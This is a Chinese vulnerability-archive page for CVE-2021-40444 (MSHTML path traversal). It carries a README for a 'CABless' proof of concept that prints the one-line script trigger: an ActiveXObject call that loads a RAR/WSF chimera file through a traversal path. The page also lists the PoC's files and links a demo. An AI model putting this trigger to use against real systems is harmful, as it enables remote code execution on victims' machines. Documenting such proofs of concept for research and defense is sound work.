关联漏洞
标题:Microsoft MSHTML.DLL 路径遍历漏洞 (CVE-2021-40444)Description:Microsoft MSHTML.DLL是美国微软(Microsoft)公司的一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 Microsoft MSHTML.DLL 存在路径遍历漏洞,远程攻击者可以创建带有恶意ActiveX控件的特制Office文档,诱使受害者打开文档并在系统上执行任意代码。
Description
Modified code so that we don´t need to rely on CAB archives
介绍
# CVE-2021-40444--CABless version
Update: Modified code so that we don´t need to rely on CAB archives
the file "index.html" that triggers payload execution will contain 1 line of code only, inside 'script' tag:
<script>new ActiveXObject('htmlfile').Script.location='.wsf:../../../Downloads/cabless.rar?.wsf';</script>
An article in PDF format is provided.
Update: link to video demo -> https://www.youtube.com/watch?v=V9XD3VboEcU
Note: The sample RAR file does NOT contain a Word document designed to exploit the vulnerability as I have taken as reference one of the PoCs posted on GitHub. Instead, it just have merged WSF and RAR data to demonstrate the path described in the article so the file can be parsed as RAR and WSF (chimera).
文件快照
[4.0K] /data/pocs/69844be2651bbe46b4540da5bbf57bb82a62e9fb
├── [311K] MS_Windows_CVE-2021-40444 - 'Ext2Prot' Vulnerability 'CABless' version.pdf
├── [ 740] README.md
└── [ 199] Sample.rar
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →